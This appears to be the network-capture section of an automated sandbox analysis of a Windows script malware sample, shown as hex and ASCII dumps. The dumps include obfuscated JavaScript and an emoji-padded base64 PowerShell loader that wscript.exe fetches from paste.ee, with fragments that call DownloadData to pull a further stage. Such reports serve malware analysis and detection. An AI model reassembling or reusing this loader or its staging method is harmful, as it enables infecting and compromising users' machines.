2025-01-05 07:32:23 UTC	16384	IN	Data Raw: 20 20 20 76 61 72 20 64 61 74 61 20 3d 20 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 73 69 7a 65 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 5b 69 5d 20 3d 20 74 79 70 65 28 62 75 66 66 65 72 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 64 61 74 61 3b 0d 0a 20 20 20 20 20 20 20 20 7d 3b 0d 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 62 69 74 73 20 3d 20 66 75 6e 63 74 69 6f 6e 28 76 61 6c 75 65 2c 20 66 72 6f 6d 62 69 74 2c 20 74 6f 62 69 74 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 76 61 6c 75 65 20 21 3d 20 27 6e 75 6d 62 65 72 27 20 Data Ascii: var data = []; for (var i = 0; i < size; i++) { data[i] = type(buffer); } return data; }; this.bits = function(value, frombit, tobit) { if (typeof value != 'number'
2025-01-05 07:32:23 UTC	16384	IN	Data Raw: 76 61 72 20 62 69 6e 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 69 66 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 62 6f 75 6e 64 29 7b 0d 0a 76 61 72 20 72 65 73 75 6c 74 3d 74 61 72 67 65 74 2e 61 70 70 6c 79 28 0d 0a 74 68 69 73 2c 0d 0a 61 72 67 73 2e 63 6f 6e 63 61 74 28 5f 41 72 72 61 79 5f 73 6c 69 63 65 5f 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 0d 0a 29 3b 0d 0a 69 66 28 4f 62 6a 65 63 74 28 72 65 73 75 6c 74 29 3d 3d 3d 72 65 73 75 6c 74 29 7b 0d 0a 72 65 74 75 72 6e 20 72 65 73 75 6c 74 3b 0d 0a 7d 0d 0a 72 65 74 75 72 6e 20 74 68 69 73 3b 0d 0a 7d 65 6c 73 65 7b 0d 0a 72 65 74 75 72 6e 20 74 61 72 67 65 74 2e 61 70 70 6c 79 28 0d 0a 74 68 61 74 2c 0d 0a 61 72 67 73 2e 63 6f 6e 63 61 74 28 5f 41 72 72 61 79 5f 73 6c 69 Data Ascii: var binder=function(){if(this instanceof bound){var result=target.apply(this,args.concat(_Array_slice_.call(arguments)));if(Object(result)===result){return result;}return this;}else{return target.apply(that,args.concat(_Array_sli
2025-01-05 07:32:23 UTC	16384	IN	Data Raw: 70 61 72 61 74 6f 72 2e 74 65 73 74 28 22 22 29 29 7b 0d 0a 6f 75 74 70 75 74 2e 70 75 73 68 28 22 22 29 3b 0d 0a 7d 0d 0a 7d 65 6c 73 65 7b 0d 0a 6f 75 74 70 75 74 2e 70 75 73 68 28 73 74 72 69 6e 67 2e 73 6c 69 63 65 28 6c 61 73 74 4c 61 73 74 49 6e 64 65 78 29 29 3b 0d 0a 7d 0d 0a 72 65 74 75 72 6e 20 6f 75 74 70 75 74 2e 6c 65 6e 67 74 68 3e 6c 69 6d 69 74 3f 6f 75 74 70 75 74 2e 73 6c 69 63 65 28 30 2c 6c 69 6d 69 74 29 3a 6f 75 74 70 75 74 3b 0d 0a 7d 3b 0d 0a 7d 28 29 29 3b 0d 0a 7d 65 6c 73 65 20 69 66 28 22 30 22 2e 73 70 6c 69 74 28 76 6f 69 64 20 30 2c 30 29 2e 6c 65 6e 67 74 68 29 7b 0d 0a 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 74 3d 66 75 6e 63 74 69 6f 6e 28 73 65 70 61 72 61 74 6f 72 2c 6c 69 6d 69 74 29 7b 0d 0a 69 Data Ascii: parator.test("")){output.push("");}}else{output.push(string.slice(lastLastIndex));}return output.length>limit?output.slice(0,limit):output;};}());}else if("0".split(void 0,0).length){String.prototype.split=function(separator,limit){i
2025-01-05 07:32:23 UTC	16384	IN	Data Raw: 61 72 20 69 3d 31 3b 0d 0a 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 66 29 2e 72 65 70 6c 61 63 65 28 2f 25 5b 73 64 6a 25 5d 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 78 29 7b 0d 0a 69 66 28 78 3d 3d 3d 27 25 25 27 29 7b 0d 0a 72 65 74 75 72 6e 27 25 27 3b 0d 0a 7d 0d 0a 69 66 28 69 3e 3d 6c 65 6e 29 7b 0d 0a 72 65 74 75 72 6e 20 78 3b 0d 0a 7d 0d 0a 73 77 69 74 63 68 28 78 29 7b 0d 0a 63 61 73 65 27 25 73 27 3a 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 61 72 67 73 5b 69 2b 2b 5d 29 3b 0d 0a 63 61 73 65 27 25 64 27 3a 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 61 72 67 73 5b 69 2b 2b 5d 29 3b 0d 0a 63 61 73 65 27 25 6a 27 3a 0d 0a 74 72 79 7b 0d 0a 72 65 74 75 72 6e 20 69 73 63 68 69 6f 70 61 67 75 73 2e 73 74 72 69 6e 67 69 66 79 28 61 72 67 73 5b 69 2b 2b 5d Data Ascii: ar i=1;return String(f).replace(/%[sdj%]/g,function(x){if(x==='%%'){return'%';}if(i>=len){return x;}switch(x){case'%s':return String(args[i++]);case'%d':return Number(args[i++]);case'%j':try{return ischiopagus.stringify(args[i++]
2025-01-05 07:32:23 UTC	16384	IN	Data Raw: 4c 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 3b 0d 0a 44 4f 4d 2e 5f 70 72 61 79 65 72 6c 69 6b 65 73 2e 70 75 73 68 28 70 72 61 79 65 72 6c 69 6b 65 29 3b 0d 0a 72 65 74 75 72 6e 20 70 72 61 79 65 72 6c 69 6b 65 3b 0d 0a 7d 3b 0d 0a 44 4f 4d 2e 63 6c 65 61 72 43 6f 6e 74 65 78 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 44 4f 4d 2e 5f 70 72 61 79 65 72 6c 69 6b 65 73 2e 6c 65 6e 67 74 68 2d 31 3b 69 3e 3d 30 3b 2d 2d 69 29 7b 0d 0a 74 72 79 7b 0d 0a 44 4f 4d 2e 5f 70 72 61 79 65 72 6c 69 6b 65 73 5b 69 5d 3d 6e 75 6c 6c 2c 64 65 6c 65 74 65 20 44 4f 4d 2e 5f 70 72 61 79 65 72 6c 69 6b 65 73 5b 69 5d 3b 0d 0a 7d 63 61 74 63 68 28 65 29 7b 7d 0d 0a 7d 0d 0a 44 4f 4d 2e 5f 70 72 61 79 65 72 6c 69 6b Data Ascii: L.apply(null,arguments);DOM._prayerlikes.push(prayerlike);return prayerlike;};DOM.clearContexts=function(){for(var i=DOM._prayerlikes.length-1;i>=0;--i){try{DOM._prayerlikes[i]=null,delete DOM._prayerlikes[i];}catch(e){}}DOM._prayerlik

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49746	188.114.96.3	443	3652	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 07:32:31 UTC	319	OUT	GET /d/DDqbU HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: paste.ee Connection: Keep-Alive
2025-01-05 07:32:31 UTC	1236	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 07:32:31 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dfbq0%2F7Llcbw4Q3qL8IJ5v2jKNDiitZEJRb%2BjO3yhVGjGol22fxhujt3DqHXhvExRDuNUKqTKr9ScvdYbUxWBoEqYbYaE2jjM%2FImfEd%2FXjop9WCKfujiW%2FlBhA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd1c662985d2394-EWR alt-svc: h3=":443"; ma=86400
2025-01-05 07:32:31 UTC	215	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 39 39 35 26 6d 69 6e 5f 72 74 74 3d 31 39 39 35 26 72 74 74 5f 76 61 72 3d 37 34 38 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 39 30 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 34 36 32 31 39 33 26 63 77 6e 64 3d 32 35 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 62 34 66 33 37 66 33 39 62 39 32 37 36 35 35 61 26 74 73 3d 32 35 31 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1995&rtt_var=748&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=901&delivery_rate=1462193&cwnd=252&unsent_bytes=0&cid=b4f37f39b927655a&ts=251&x=0"
2025-01-05 07:32:31 UTC	1287	IN	Data Raw: 31 61 32 39 0d 0a 67 6c 6f 6d 65 72 69 73 20 3d 20 7b 0d 0a 20 20 20 20 72 65 75 73 65 61 62 6c 65 3a 20 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 2c 0d 0a 20 20 20 20 64 65 63 6f 64 65 3a 20 66 75 6e 63 74 69 6f 6e 28 68 6f 6c 6c 6f 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 20 3d 20 22 22 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 65 67 75 73 74 2c 20 74 69 62 69 69 66 6f 72 6d 2c 20 6d 65 72 67 75 6c 75 73 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 6e 6f 6e 63 6f 76 65 72 65 64 2c 20 6c 69 6d 61 6e 2c 20 68 65 6c 6c 65 73 70 6f 6e 74 69 6e 65 Data Ascii: 1a29glomeris = { reuseable: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", decode: function(hollo) { var decodedString = ""; var degust, tibiiform, mergulus; var noncovered, liman, hellespontine
2025-01-05 07:32:31 UTC	1369	IN	Data Raw: 4c 55 4e 76 62 57 31 68 62 6d 51 67 49 6d 6c 6d 49 43 67 6b 62 6e 56 73 62 43 e2 9a 97 f0 9f 8c 8f f0 9f 8f 90 f0 9f 94 9e f0 9f 8e 8a f0 9f 91 a9 f0 9f 97 b1 f0 9f 90 b1 f0 9f 8c b4 f0 9f 91 8c f0 9f 94 90 e2 9a 98 f0 9f 92 8e f0 9f 98 8e f0 9f 90 81 74 62 6d 55 67 4a 46 42 54 56 6d 56 79 63 32 6c 76 62 6c 52 68 59 6d 78 6c 49 43 31 68 62 6d 51 67 4a 46 42 54 56 6d 56 79 63 32 6c 76 62 6c 52 68 59 6d 78 6c 4c 6c 42 54 56 6d 56 79 63 32 6c 76 62 69 e2 9a 97 f0 9f 8c 8f f0 9f 8f 90 f0 9f 94 9e f0 9f 8e 8a f0 9f 91 a9 f0 9f 97 b1 f0 9f 90 b1 f0 9f 8c b4 f0 9f 91 8c f0 9f 94 90 e2 9a 98 f0 9f 92 8e f0 9f 98 8e f0 9f 90 81 74 62 6d 55 67 4a 47 35 31 62 47 77 70 49 48 73 67 57 33 5a 76 61 57 52 64 4a 46 42 54 56 6d 56 79 63 32 6c 76 62 6c 52 68 59 6d 78 6c 4c Data Ascii: LUNvbW1hbmQgImlmICgkbnVsbCtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbitbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlL
2025-01-05 07:32:31 UTC	1369	IN	Data Raw: 6c 62 6e 51 37 4a 45 4e 56 59 31 64 76 61 55 39 61 59 6c 70 73 54 47 74 4c 5a 6d 74 4d 54 6b 74 75 49 44 30 67 4a 45 4a 42 53 32 68 4c 59 55 78 4c 53 32 68 56 65 6c 64 42 61 55 78 76 55 47 56 55 4c 6b 52 76 64 32 35 73 62 32 46 6b 52 47 46 30 59 53 67 6b 61 55 78 69 51 31 52 4f 51 31 4e 68 59 32 46 56 51 6d 78 36 62 6b 74 6b 54 45 77 70 4f 79 52 6f 62 6d 4a 6a 54 46 70 58 57 6b 6c 53 63 47 68 58 61 58 4a 58 59 6b 74 76 55 43 e2 9a 97 f0 9f 8c 8f f0 9f 8f 90 f0 9f 94 9e f0 9f 8e 8a f0 9f 91 a9 f0 9f 97 b1 f0 9f 90 b1 f0 9f 8c b4 f0 9f 91 8c f0 9f 94 90 e2 9a 98 f0 9f 92 8e f0 9f 98 8e f0 9f 90 81 39 49 46 74 54 65 58 4e 30 5a 57 30 75 56 47 56 34 64 43 35 46 62 6d 4e 76 5a 47 6c 75 5a 31 30 36 4f 6c 56 55 52 6a 67 75 52 32 56 30 55 33 52 79 61 57 35 6e 4b Data Ascii: lbnQ7JENVY1dvaU9aYlpsTGtLZmtMTktuID0gJEJBS2hLYUxLS2hVeldBaUxvUGVULkRvd25sb2FkRGF0YSgkaUxiQ1ROQ1NhY2FVQmx6bktkTEwpOyRobmJjTFpXWklScGhXaXJXYktvUC9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nK
2025-01-05 07:32:31 UTC	1369	IN	Data Raw: 9f 94 9e f0 9f 8e 8a f0 9f 91 a9 f0 9f 97 b1 f0 9f 90 b1 f0 9f 8c b4 f0 9f 91 8c f0 9f 94 90 e2 9a 98 f0 9f 92 8e f0 9f 98 8e f0 9f 90 81 74 49 43 52 76 61 55 64 48 64 6c 52 53 5a 56 4e 30 55 56 70 4d 61 45 74 4d 54 45 4a 58 53 6a 73 6b 64 6c 70 44 57 6c 4a 6f 63 32 52 58 63 47 31 71 54 45 4e 56 5a 57 31 6b 55 56 49 67 50 53 e2 9a 97 f0 9f 8c 8f f0 9f 8f 90 f0 9f 94 9e f0 9f 8e 8a f0 9f 91 a9 f0 9f 97 b1 f0 9f 90 b1 f0 9f 8c b4 f0 9f 91 8c f0 9f 94 90 e2 9a 98 f0 9f 92 8e f0 9f 98 8e f0 9f 90 81 6b 61 47 35 69 59 30 78 61 56 31 70 4a 55 6e 42 6f 56 32 6c 79 56 32 4a 4c 62 31 e2 9a 97 f0 9f 8c 8f f0 9f 8f 90 f0 9f 94 9e f0 9f 8e 8a f0 9f 91 a9 f0 9f 97 b1 f0 9f 90 b1 f0 9f 8c b4 f0 9f 91 8c f0 9f 94 90 e2 9a 98 f0 9f 92 8e f0 9f 98 8e f0 9f 90 81 75 55 33 Data Ascii: tICRvaUdHdlRSZVN0UVpMaEtMTEJXSjskdlpDWlJoc2RXcG1qTENVZW1kUVIgPSkaG5iY0xaV1pJUnBoV2lyV2JLb1uU3
2025-01-05 07:32:31 UTC	1311	IN	Data Raw: 64 53 56 30 4e 76 5a 30 77 6e 4c 43 64 72 55 31 56 51 65 6d 56 58 51 55 74 78 63 31 64 6f 56 31 4a 58 51 32 39 6e 54 43 63 73 4a 32 74 54 56 56 42 36 5a 56 64 42 53 33 46 7a 56 32 68 58 55 6c 64 44 62 32 64 4d 4a 79 77 6e 61 31 4e 56 55 48 70 6c 56 30 46 4c 63 58 4e 58 61 46 64 53 56 30 4e 76 5a 30 77 6e 4c 43 64 72 55 31 56 51 65 6d 56 58 51 55 74 78 63 31 64 6f 56 31 4a 58 51 32 39 6e 54 43 63 73 4a 32 74 54 56 56 42 36 5a 56 64 42 53 33 46 7a 56 32 68 58 55 6c 64 44 62 32 64 4d 4a 79 77 6e 4d 53 63 73 4a 32 74 54 56 56 42 36 5a 56 64 42 53 33 46 7a 56 32 68 58 55 6c 64 44 62 32 64 4d 4a 79 77 6e 56 47 46 7a 61 30 35 68 62 57 55 6e 4b 53 6b 37 61 57 59 67 4b 43 52 75 64 57 78 73 49 43 31 75 5a 53 e2 9a 97 f0 9f 8c 8f f0 9f 8f 90 f0 9f 94 9e f0 9f 8e 8a Data Ascii: dSV0NvZ0wnLCdrU1VQemVXQUtxc1doV1JXQ29nTCcsJ2tTVVB6ZVdBS3FzV2hXUldDb2dMJywna1NVUHplV0FLcXNXaFdSV0NvZ0wnLCdrU1VQemVXQUtxc1doV1JXQ29nTCcsJ2tTVVB6ZVdBS3FzV2hXUldDb2dMJywnMScsJ2tTVVB6ZVdBS3FzV2hXUldDb2dMJywnVGFza05hbWUnKSk7aWYgKCRudWxsIC1uZS
2025-01-05 07:32:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49761	142.250.186.97	443	5252	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 07:32:40 UTC	594	OUT	GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-05 07:32:40 UTC	570	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC4oD3WMEGUZmzouuseazeeq5Ytkd-1ur7QFOZ7MfnA7_Yges25xMCFMCFc8f2ojoPswNNkZhB8 Accept-Ranges: bytes Content-Length: 154477 X-Goog-Hash: crc32c=F5qq4g== Server: UploadServer Date: Sat, 04 Jan 2025 15:58:13 GMT Expires: Sun, 04 Jan 2026 15:58:13 GMT Cache-Control: public, max-age=31536000 Age: 56067 Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-05 07:32:40 UTC	820	IN	Data Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2025-01-05 07:32:40 UTC	1390	IN	Data Raw: d5 b5 fc 3c 0f e3 f9 d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c Data Ascii: <Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,\|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rt
2025-01-05 07:32:40 UTC	1390	IN	Data Raw: b0 78 c3 9a 50 64 5d fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 Data Ascii: xPd]@uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4\|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[u
2025-01-05 07:32:41 UTC	1390	IN	Data Raw: d6 e1 6d c0 c8 18 51 ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 Data Ascii: mQVkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G\|?6:{r;iG
2025-01-05 07:32:41 UTC	1390	IN	Data Raw: d9 c3 10 d6 1f b2 cd fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}\|.nw'Gw=n'CSZB=
2025-01-05 07:32:41 UTC	1390	IN	Data Raw: 3b ad 00 5e b3 4e cb 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e Data Ascii: ;^Ns=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%pA8C4qc(>@z1/V\|#Bo4v_mnniN ZKa./<_PBzi7~>
